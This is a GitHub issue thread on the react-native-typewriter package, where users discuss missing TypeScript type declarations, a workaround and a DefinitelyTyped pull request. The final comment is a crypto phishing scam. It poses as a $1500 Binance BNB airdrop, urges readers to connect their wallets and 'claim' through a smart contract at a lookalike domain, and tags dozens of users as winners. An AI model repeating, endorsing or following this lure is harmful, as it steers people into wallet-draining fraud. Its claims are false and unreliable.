### ISSUE TITLE
Add type declarations for TypeScript users

### ISSUE THREAD

**Issue by roshnet** [TaylorBriggs/react-native-typewriter#41]
Hi @TaylorBriggs,

I'm just came across this package. It looks good and worth trying out, but I cannot do that yet because of missing type declarations.

It would be great to have the corresponding `@types` declaration for this package, so that we can simply install types like so -

```
$ yarn add @types/react-native-typewriter
```

For now, I guess I will add custom declaration file or something to make it work :crossed_fingers:.
<br>
Thanks!

**Comment by TaylorBriggs** [comment]
I'll try to take a look when I can, but if you put the types together yourself there's nothing stopping you from publishing that; the beauty of open source. My experience with TypeScript is pretty limited, so do those types need to correspond to the props? Thanks for opening the issue, as I know TS is really popular these days.

**Comment by roshnet** [comment]
Indeed, I did that (had to add a definition file in `node_modules/react-native-typewriter/`). It works fine. Thing is, anyone installing (or updating) it has to add custom typings every time. I'll see if I can open a PR to get that fixed once I get some time.

PS: I'm now using this in the app I'm working on. Thanks again for writing the library!

**Comment by JosephPBallantyne** [comment]
Quick solution found here: https://medium.com/@steveruiz/using-a-javascript-library-without-type-declarations-in-a-typescript-project-3643490015f3

I may add typing if I get the chance :)

**Comment by ScreamZ** [comment]
@TaylorBriggs  @roshnet While it's better when it's embedded within the repository, I've made a PR for typing https://github.com/DefinitelyTyped/DefinitelyTyped/pull/64283

if you need to add it directly on the repo, just tell me I'll explain you. (would be better)

**Comment by peter-bennett** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @snehesht, @guaifish, @indiejoseph, @pedrochiossi, @TheRezDev, @unhingedmagikarp, @leechseed, @amh22, @donkeyyu, @amcdnl, @jlozovei, @JoonsungUm, @loic-sharma, @unnmdnwb3, @angristan, @ghoshnirmalya, @ob1dev, @CMD-reverse, @taehwanno, @ajsonky, @ABODFTW, @tbergman, @modulexcite, @phenrique7, @ppremk, @IvanPostarnak, @Jomocx, @fabianlee1211, @rammurmu, @Santeenee, @nucliweb, @y-u-t-a, @zvnkio, @seungha-kim, @JamesLinus, @MichelML, @ChrisKatsaras, @ch-d, @johnrjj, @benkoller, @hylickipiotr, @gsanikidze, @jamaluddinrumi, @mzalevski, @guilfer-dev, @muslih, @kimsehwan96, @thetalesofj, @sobolev-alexey, @puregarlic
